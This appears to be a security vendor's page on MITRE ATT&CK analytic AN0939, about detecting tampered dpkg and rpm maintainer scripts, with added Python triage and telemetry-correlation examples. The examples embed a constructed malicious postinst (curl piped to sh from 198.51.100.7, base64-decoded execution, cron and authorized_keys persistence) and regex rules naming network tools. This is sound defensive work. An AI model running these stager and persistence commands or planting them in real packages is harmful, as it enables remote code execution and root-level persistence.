MITRE ATT&CK® Analytic

AN0939: Analytic 0939

Detection of maintainer scripts (e.g., postinst, preinst) being modified or executed during dpkg or rpm operations. Watch for script content that spawns additional processes or writes outside package scope.

Enterprise | AN0939 | Analytic | Object v1.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: High

This analytic is relevant to Linux software supply-chain and endpoint integrity risk. Debian-format packages carry maintainer scripts (preinst, postinst, prerm, postrm) and RPM packages carry the equivalent scriptlets (%pre, %post, %preun, %postun); dpkg and rpm run them as root during install, upgrade, and removal, so a script that has been modified, or whose execution spawns unexpected processes or writes outside the package's own files, may indicate a package operation doing more than normal installation or upgrade work. For leaders, the decision value is whether Linux package activity is visible enough for the SOC and IR teams to distinguish routine administration from suspicious process spawning or file writes outside the expected package scope.

Executive priority

Prioritize this where Linux systems support critical services, regulated workloads, build environments, or administrative infrastructure. The business question is not simply whether dpkg or rpm exists, but whether package-management activity is logged, attributable, and reviewable during incidents or audits. This can support operational resilience, change-control evidence, and incident triage when unexpected software changes coincide with service disruption or integrity concerns.

Technical view

Validate monitoring for Linux package manager operations involving dpkg and rpm, with attention to maintainer scripts such as preinst and postinst. Since ATT&CK does not provide a separate detection body for this analytic and no tactic relationships are supplied, teams should work from the description itself: detect maintainer scripts being modified (on Debian-based systems the installed copies live under /var/lib/dpkg/info/<package>.postinst and siblings; rpm stores scriptlets in its database, viewable with `rpm -q --scripts <package>`) or executed during package operations, then inspect the script content and its child behavior for additional process spawning or writes outside the package’s expected file list. Both package managers run these scripts as root, so any unexpected action carries full privileges. Baseline legitimate package installation, upgrade, and removal activity to reduce noise from normal administrative workflows.
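Script content inspection, as an added worked example for this page (Python, written here rather than taken from MITRE or Glexia): the two postinst scripts below are constructed for illustration, and the rule list and the hash comparison against the package's shipped copy are assumptions about what a local triage step would look like, not a complete signature set.

```python
"""Static triage of dpkg/rpm maintainer script content.

Added example for this page, not MITRE or Glexia tooling. Both scripts below are
constructed for illustration, and the rule list is a starting point to tune, not a
complete signature set.
"""
import hashlib
import re

# Constructed sample: the kind of postinst debhelper generates for a small service.
BENIGN_POSTINST = """#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
    if ! getent passwd hello >/dev/null; then
        adduser --system --no-create-home --group hello
    fi
    chown hello:hello /var/lib/hello
fi
if [ -d /run/systemd/system ]; then
    deb-systemd-helper enable hello.service >/dev/null || true
    deb-systemd-invoke start hello.service >/dev/null || true
fi
"""

# Constructed sample: the same skeleton with a stager and persistence grafted in.
TAMPERED_POSTINST = """#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
    chown hello:hello /var/lib/hello
fi
curl -fsSL http://198.51.100.7/s | sh
echo 'ZWNobyBwd25lZA==' | base64 -d | sh
echo '* * * * * root /usr/local/bin/hello-helper' > /etc/cron.d/hello-update
cat /tmp/k >> /root/.ssh/authorized_keys
nohup /usr/local/bin/hello-helper >/dev/null 2>&1 &
"""

# Each rule names one behaviour that legitimate maintainer scripts rarely need.
RULES = [
    ("network_fetch", re.compile(r"\b(curl|wget|nc|ncat|socat)\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(sh|bash|dash|python3?|perl)\b")),
    ("decode_and_run", re.compile(r"base64\s+(-d|--decode)|\beval\b|xxd\s+-r")),
    ("persistence_path", re.compile(
        r"/etc/cron\.(d|hourly|daily|weekly)/|/var/spool/cron|\.ssh/authorized_keys|"
        r"/etc/ld\.so\.preload|/etc/rc\.local|/etc/profile\.d/")),
    ("background_daemon", re.compile(r"\b(nohup|setsid)\b|&\s*$")),
]


def scan_script(text):
    """Return one finding per (rule, line) hit, skipping blank lines and comments."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for rule, rx in RULES:
            if rx.search(line):
                findings.append({"rule": rule, "line": lineno, "text": stripped})
    return findings


def _digest(text):
    return hashlib.sha256(text.encode()).hexdigest()


def is_modified(installed_text, reference_text):
    """True when the installed script differs from the copy shipped in the package.

    On Debian the installed copy lives at /var/lib/dpkg/info/<pkg>.postinst and the
    reference is the control archive inside the .deb; on RPM systems `rpm -q --scripts`
    prints the scriptlets held in the rpm database. Both are compared here by hash.
    """
    return _digest(installed_text) != _digest(reference_text)


def triage(package, installed_text, reference_text):
    """Combine the modification check and the content scan into one verdict."""
    findings = scan_script(installed_text)
    return {
        "package": package,
        "modified": is_modified(installed_text, reference_text),
        "rules_hit": sorted({f["rule"] for f in findings}),
        "findings": findings,
    }


if __name__ == "__main__":
    report = triage("hello", TAMPERED_POSTINST, BENIGN_POSTINST)
    print(f"{report['package']}: modified={report['modified']} rules={report['rules_hit']}")
    for f in report["findings"]:
        print(f"  line {f['line']:>2} [{f['rule']}] {f['text']}")
```

The benign script produces no findings; the tampered one trips all five rules. Pattern matching of this kind is cheap to run across /var/lib/dpkg/info at install time, but it is a triage aid rather than a verdict: a script can stage its payload in a way none of these expressions catch, which is why the behavioral view (what the script actually spawned and wrote) should back it up.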

Likely telemetry

  • Linux process execution telemetry for dpkg, rpm, package helper processes, shell interpreters, and child processes spawned during package operations
  • File creation and modification telemetry for package maintainer scripts such as preinst and postinst
  • File write telemetry showing paths written during package operations, especially writes outside expected package scope
  • Package management logs where available: /var/log/dpkg.log and /var/log/apt/history.log on Debian-based systems, and the rpm database together with dnf or yum transaction history on RPM-based systems
  • User, privilege, host, and change-window context for package installation or upgrade activity

Detection direction

  • Confirm that Linux endpoint telemetry captures parent-child process relationships during dpkg and rpm operations.
  • Tune for maintainer scripts that spawn additional processes, especially shells or utilities not normally associated with the package workflow.
  • Compare file writes during package operations against expected package scope to identify unusual destinations.
  • Correlate alerts with authorized change windows, package management logs, and administrative identities to reduce false positives from legitimate maintenance.
  • Treat lack of script content visibility, missing process lineage, or incomplete file-write telemetry as material blind spots for this analytic.
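Putting the lineage and scope checks together, as an added example for this page (Python, written here rather than taken from MITRE or Glexia): the process and file-write events are constructed, and the event field names, the package-scope table and the baseline of expected child helpers are assumptions standing in for whatever the local EDR or auditd pipeline actually provides.

```python
"""Correlate process lineage and file writes around dpkg/rpm maintainer scripts.
Added example for this page, not MITRE or Glexia logic; event fields, package scope
and the child baseline are assumptions standing in for the local EDR/auditd feed."""
import os
import re
from collections import defaultdict, deque

# Constructed sample telemetry (not captured from a real host).
EVENTS = [
    # dpkg installing "hello": postinst fetches a binary and drops a cron job
    {"type": "process", "pid": 1000, "ppid": 1, "exe": "/usr/bin/dpkg",
     "cmdline": "dpkg -i /root/hello_1.0_amd64.deb"},
    {"type": "process", "pid": 1001, "ppid": 1000, "exe": "/bin/sh",
     "cmdline": "/bin/sh /var/lib/dpkg/info/hello.postinst configure"},
    {"type": "process", "pid": 1002, "ppid": 1001, "exe": "/sbin/ldconfig", "cmdline": "ldconfig"},
    {"type": "process", "pid": 1003, "ppid": 1001, "exe": "/usr/bin/curl",
     "cmdline": "curl -fsSL http://198.51.100.7/p -o /usr/local/bin/hello-helper"},
    {"type": "file_write", "pid": 1003, "path": "/usr/local/bin/hello-helper"},
    {"type": "file_write", "pid": 1001, "path": "/etc/cron.d/hello-update"},
    {"type": "file_write", "pid": 1001, "path": "/var/lib/hello/state"},
    # rpm upgrading "tool": scriptlet reloads systemd (normal) and edits authorized_keys
    {"type": "process", "pid": 2000, "ppid": 1, "exe": "/usr/bin/rpm",
     "cmdline": "rpm -Uvh /root/tool-2.0-1.x86_64.rpm"},
    {"type": "process", "pid": 2001, "ppid": 2000, "exe": "/bin/sh",
     "cmdline": "/bin/sh /var/tmp/rpm-tmp.Xa9Qz1 1"},
    {"type": "process", "pid": 2002, "ppid": 2001, "exe": "/usr/bin/systemctl",
     "cmdline": "systemctl daemon-reload"},
    {"type": "file_write", "pid": 2001, "path": "/root/.ssh/authorized_keys"},
    # an admin running curl from an interactive shell: not a package operation
    {"type": "process", "pid": 3000, "ppid": 1, "exe": "/bin/bash", "cmdline": "-bash"},
    {"type": "process", "pid": 3001, "ppid": 3000, "exe": "/usr/bin/curl",
     "cmdline": "curl -o /root/index.html https://example.org/"},
    {"type": "file_write", "pid": 3001, "path": "/root/index.html"},
]
# Assumed package scope, as /var/lib/dpkg/info/<pkg>.list or `rpm -ql <pkg>` would
# report it; a prefix ending in "/" covers the whole tree beneath it.
PACKAGE_SCOPE = {
    "hello": ["/usr/bin/hello", "/usr/share/doc/hello/", "/var/lib/hello/"],
    "tool": ["/usr/bin/tool", "/usr/lib/systemd/system/tool.service", "/etc/tool/"],
}
SHARED_OK_PREFIXES = ("/var/lib/dpkg/", "/var/lib/rpm/", "/var/cache/", "/var/log/", "/run/")
# Illustrative baseline of helpers maintainer scripts normally invoke; tune per fleet.
BASELINE_CHILDREN = {
    "ldconfig", "systemctl", "update-rc.d", "invoke-rc.d", "deb-systemd-helper",
    "deb-systemd-invoke", "update-alternatives", "dpkg-maintscript-helper", "ucf", "getent",
    "useradd", "groupadd", "adduser", "addgroup", "chown", "chmod", "mkdir", "install", "ln",
    "rm", "cp", "mv", "sed", "grep", "depmod", "chkconfig", "restorecon", "sh", "dash", "bash",
}
DPKG_SCRIPT_RE = re.compile(r"/var/lib/dpkg/info/(?P<pkg>[^/\s]+)\.(pre|post)(inst|rm)\b")
RPM_SCRIPT_RE = re.compile(r"/var/tmp/rpm-tmp\.\S+")  # rpm runs scriptlets from a temp file
RPM_FILE_RE = re.compile(r"(?P<pkg>[A-Za-z][\w+.]*?)-\d[^/\s]*\.rpm\b")


def index_events(events):
    """Build pid->process, parent->children and pid->written-paths maps."""
    procs, children, writes = {}, defaultdict(list), defaultdict(list)
    for ev in events:
        if ev["type"] == "process":
            procs[ev["pid"]] = ev
            children[ev["ppid"]].append(ev["pid"])
        else:
            writes[ev["pid"]].append(ev["path"])
    return procs, children, writes


def descendants(pid, children):
    """Transitive children of `pid`, breadth first."""
    out, queue = [], deque(children.get(pid, []))
    while queue:
        out.append(queue.popleft())
        queue.extend(children.get(out[-1], []))
    return out


def maintainer_scripts(procs, children):
    """Yield (script_process, package) for each shell dpkg/rpm spawned to run a script."""
    for pid, proc in procs.items():
        if os.path.basename(proc["exe"]) not in {"dpkg", "rpm"}:
            continue
        for child in (procs[c] for c in children.get(pid, [])):
            m = DPKG_SCRIPT_RE.search(child["cmdline"])
            if m:
                yield child, m.group("pkg")
            elif RPM_SCRIPT_RE.search(child["cmdline"]):
                m = RPM_FILE_RE.search(proc["cmdline"])  # the temp file names no package
                yield child, (m.group("pkg") if m else "unknown")


def in_scope(path, package):
    """True if the path is a file or tree the package owns, or a shared writable location."""
    prefixes = list(PACKAGE_SCOPE.get(package, [])) + list(SHARED_OK_PREFIXES)
    return any(path == p or (p.endswith("/") and path.startswith(p)) for p in prefixes)


def analyze(events):
    """Findings: unexpected children of, and out-of-scope writes by, maintainer scripts."""
    procs, children, writes = index_events(events)
    findings = []
    for script, pkg in maintainer_scripts(procs, children):
        for pid in [script["pid"]] + descendants(script["pid"], children):
            proc = procs[pid]
            if pid != script["pid"] and os.path.basename(proc["exe"]) not in BASELINE_CHILDREN:
                findings.append({"kind": "unexpected_child", "package": pkg,
                                 "pid": pid, "cmdline": proc["cmdline"]})
            findings.extend({"kind": "out_of_scope_write", "package": pkg, "pid": pid, "path": p}
                            for p in writes.get(pid, []) if not in_scope(p, pkg))
    return findings


if __name__ == "__main__":
    print(*analyze(EVENTS), sep="\n")
```

Running `analyze(EVENTS)` yields four findings: the cron drop and the curl child (plus curl's write) under the hello postinst, and the authorized_keys write under the tool scriptlet; ldconfig, systemctl, the in-scope state file and the admin's interactive curl are all filtered by the three baselines. Two caveats matter in production. Without parent-child linkage from the sensor, `maintainer_scripts` finds nothing, which is exactly the blind spot the last bullet above describes. And the rpm attribution is weak: the scriptlet temp file names no package, and when installs go through dnf or yum the shell's parent is that manager's process rather than `rpm` (librpm runs in-process), so the parent set and the package lookup need to reflect how the fleet actually installs software.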

Mitigation priorities

  • Maintain disciplined Linux package change control so package operations can be tied to approved maintenance activity.
  • Restrict package installation and upgrade privileges to authorized administrators and managed automation accounts.
  • Preserve package manager logs and endpoint telemetry long enough to support incident response and compliance evidence.
  • Review monitoring coverage on critical Linux servers first, especially systems where unauthorized software change would affect business continuity.
  • Use IR playbooks that include package-operation review, maintainer script inspection, and validation of unexpected child processes or out-of-scope file writes.

Analyst notes and limits

This object is a detection analytic, not a technique. It is scoped to Linux and specifically references dpkg/rpm maintainer scripts. No ATT&CK tactics, relationships, aliases, or official detection logic were supplied, so the take focuses on validation and evidence classes rather than a specific rule implementation.

The supplied ATT&CK fields do not provide executable detection logic, data source mappings, related techniques, adversary use, impact, or attribution. Local baselines, package inventory, endpoint telemetry depth, and change-management records are required to determine whether observed behavior is suspicious.

Official MITRE ATT&CK definition

Analytic 0939

Detection of maintainer scripts (e.g., postinst, preinst) being modified or executed during dpkg or rpm operations. Watch for script content that spawns additional processes or writes outside package scope.


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. Where multiple ATT&CK source imports are retained, the table compares the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 1.0
Raw hash: 8831ba768208dc93...

Imported snapshots across ATT&CK releases (1)

Release  Bundle imported  Object version  Modified  Status          Raw hash
19.1     -                1.0             -         Current bundle  8831ba768208…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack AN0939

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.